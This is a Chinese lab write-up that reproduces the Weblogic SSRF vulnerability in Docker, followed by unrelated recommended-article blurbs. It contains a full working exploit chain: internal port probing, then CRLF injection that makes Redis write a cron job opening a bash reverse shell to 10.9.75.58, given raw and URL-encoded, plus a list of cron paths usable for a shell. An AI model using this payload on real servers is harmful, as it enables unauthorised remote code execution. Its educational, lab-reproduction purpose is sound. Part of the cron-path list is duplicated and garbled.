Weblogic SSRF 漏洞复现

2023-09-12 21:46:25

SSRF 实例

Weblogic SSRF 到GetShell

​ Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境搭建

编译及启动测试环境

sudo docker compose up -d

image-20230904190714192

访问http://10.9.75.58:7001/console :

image-20230904190849697

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用:

image-20230904191122325

点击Search Public Registries ,并点击searh,进行抓包:

image-20230904191930922

我们猜测url这里存在ssrf漏洞,我们验证一下:

首先获取一个域名,这里获得的域名为:budkzl.dnslog.cn ,然后把该域名放到抓取的url中,为了便于确认,在前面写上123.

image-20230904192414625

查看是否能完成该DNS解析:

image-20230904192716273

我们看到这里有请求,说明我们这里输入的url地址,它会替我们发送url请求,说明这里存在ssrf漏洞

我们查看一下这个响应包:

image-20230904193400749

我们把url换成127.0.0.1,查看其响应:

image-20230904193622686

有响应,说明127.0.0.1这个地址是存活的,然后根据报错信息得出:通过HTTP不能连接服务器的80端口,所以80端口没有开放

我们找一个现在一定开放的端口(7001端口)试一下:

image-20230904194158378

状态码第一位数字决定了不同的响应状态,有如下:

  • 1 >> 开始发送请求 >> 消息
  • 2 >> 请求发送完成 >> 成功
  • 3 >> 开始读取响应 >> 重定向
  • 4 >> 读取响应结束 >> 请求错误
  • 5 表示服务器错误

常见服务器状态码
200:服务器响应正常,并正确返回。
304:该目标资源在上次请求后没有任何修改(通常用于浏览器的缓存机制,使用GET请求时尤其需要注意)。
400:无法找到请求的资源,可能原因:
(1) 语义有误,当前请求无法被服务器理解。
(2) 请求参数有误。
401:要访问的目标资源的权限不够,或者说当前请求需要用户验证;
403:没有权限访问资源。
404:找不到访问的对象,或者要访问的目标资源不存在。
405:要访问的目标资源被禁止。
414:请求的URL太长。
500:服务器内部代码错误。

还是不清楚了,那我们可以对比一下7002端口(没有开放):

image-20230904194736862

现在我们就可以对本机的ip做探测,目标一般开的是docker环境。

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发现172.22.0.2:6379可以连通:

将172.22.0.2输入到url请求中:

image-20230904201320372

将172.21.0.1输入到url请求中:

image-20230904201107603

这时,我们已经知道了172.22.0.2这个IP地址是存活的,那么我们可以判断有哪些端口是开放的

检测3389 (远程桌面)端口:

image-20230904201553918

没有开放3389端口。

检测6379(redis数据库)端口:

image-20230904202347262

表示6379端口是开放的。并且没有回显

既然我们知道了redis数据库端口是开放的,我们也知道redis数据库存在未授权访问漏洞,我们可以利用其进行读写文件。

我们采用计划任务来获取反弹shell

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.75.58/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.58%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

&operator=http://172.22.0.2:6379/gehuii%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.58%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aagehui

成功反弹shell:

image-20230904204847421

补充:

​ 最后补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
    tab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件
更多推荐

【面试题】智力题

文章目录腾讯1000瓶毒药里面只有1瓶是有毒的,问需要多少只老鼠才能在24小时后试出那瓶有毒。有两根不规则的绳子,两根绳子从头烧到尾均需要一个小时,现在有一个45分钟的比赛,裁判员忘记带计时器,你能否通过烧绳子的方式来为这场比赛计时?有25匹马,5条赛道,每条赛道同时只能有一匹马跑,假设每匹马的水平都很稳定,在没有计时

go并发处理业务

引言实际上,在服务端程序开发和爬虫程序开发时,我们的大多数业务都是IO密集型业务,什么是IO密集型业务,通俗地说就是CPU运行时间只占整个业务执行时间的一小部分,而剩余的大部分时间都在等待IO操作。IO操作包括http请求、数据库查询、文件读取、摄像设备录音设备的输入等等。这些IO操作会引起中断,使业务线程暂时放弃cp

PaddlePaddle Hackathon 飞桨黑客马拉松热身赛上线!

挑战自我拓展技能激发创新挑战极限再次相遇黑客松我们期待你的加入!第五期PaddlePaddleHackathon飞桨黑客马拉松热身赛上线,本次活动是面向全球开发者的深度学习领域编程活动,鼓励开发者了解和参与飞桨深度学习开源项目与文心大模型开发实践。本次飞桨黑客马拉松活动包含三大赛道:开源贡献个人挑战赛、大模型应用与创意

Mybatis - 常用 SQL 语句设计思路及具体实现 - 数据存在则更新,不存在则插入、批量更新、批量插入、连表查询 + - 字段加减法

目录序言一、数据存在则更新,不存在则插入1、ONDUPLICATEKEYUPDATE的具体xml用法:(虽然有点问题,但没准以后有用到的时候)onduplicatekeyupdate用法总结:二、批量更新方法一:(数据量越多,容易变成慢SQL,不太推荐)方法二方法三(推荐)三、批量插入四、连表查询+-字段加减法1、连表

SQL故障和排查解决浅析

MySQL长连接MySQL长连接是指应用程序与MySQL数据库之间的连接在执行完一个操作后不会立即关闭,而是保持活动状态以供后续使用。这种连接模式在某些情况下可以提高性能,但也可能导致一些问题。以下是MySQL长连接的一些现象和排查方法:现象连接数积累增加:如果应用程序中的长连接没有得到正确管理和释放,数据库服务器上的

《PostgreSQL数据分区:原理与实战》

🌷🍁博主猫头虎(🐅🐾)带您GotoNewWorld✨🍁🐅🐾猫头虎建议程序员必备技术栈一览表📖:🛠️全栈技术FullStack:📚MERN/MEAN/MEVNStack|🌐Jamstack|🌍GraphQL|🔁RESTfulAPI|⚡WebSockets|🔄CI/CD|🌐Git&Versio

Makefile详解&实战

title:Makefile详解&实战date:2023-09-2012:01:24comments:true#是否可评论toc:true#是否显示文章目录categories:#分类-CMaketags:#标签-CMake-Makefilesummary:Makefile详解&实战Makefile详解&实战什么是Ma

《打造高可用PostgreSQL:策略与工具》

🌷🍁博主猫头虎(🐅🐾)带您GotoNewWorld✨🍁🐅🐾猫头虎建议程序员必备技术栈一览表📖:🛠️全栈技术FullStack:📚MERN/MEAN/MEVNStack|🌐Jamstack|🌍GraphQL|🔁RESTfulAPI|⚡WebSockets|🔄CI/CD|🌐Git&Versio

什么是JVM常用调优策略?分别有哪些?

目录一、JVM调优二、堆内存大小调整三、垃圾回收器调优四、线程池调优一、JVM调优Java虚拟机(JVM)的调优主要是为了提高应用程序的性能,包括提高应用程序的响应速度和吞吐量。以下是一些常用的JVM调优策略:堆内存大小调整:JVM的堆内存是用于存储对象实例的内存区域。通过调整堆内存的大小,可以找到最适合你的应用程序的

【案例教学】华为云API对话机器人的魅力—体验AI垃圾分类机器人

云服务、API、SDK,调试,查看,我都行阅读短文您可以学习到:人工智能AI自言语言的情感分析、文本分词、文本翻译1IntelliJIDEA之API插件介绍API插件支持VSCodeIDE、IntelliJIDEA等平台、以及华为云自研CodeArtsIDE,基于华为云服务提供的能力,帮助开发者更高效、便捷的搭建应用。

现在全国融资融券两融利率最低是多少?哪家证券公司券商费率低?

融资融券是指投资者通过向券商借入资金(融资)或借入证券(融券),以达到获得更高收益、降低交易风险、提高资金利用效率的目的。通过融资,投资者可以用借入的资金买入更多的证券;通过融券,投资者可以借入证券卖出并借入现金,以期待股票或证券价格下跌后再回购并归还借入的证券,获得差价收益。融资融券是证券市场中的一种融资方式和交易策

热文推荐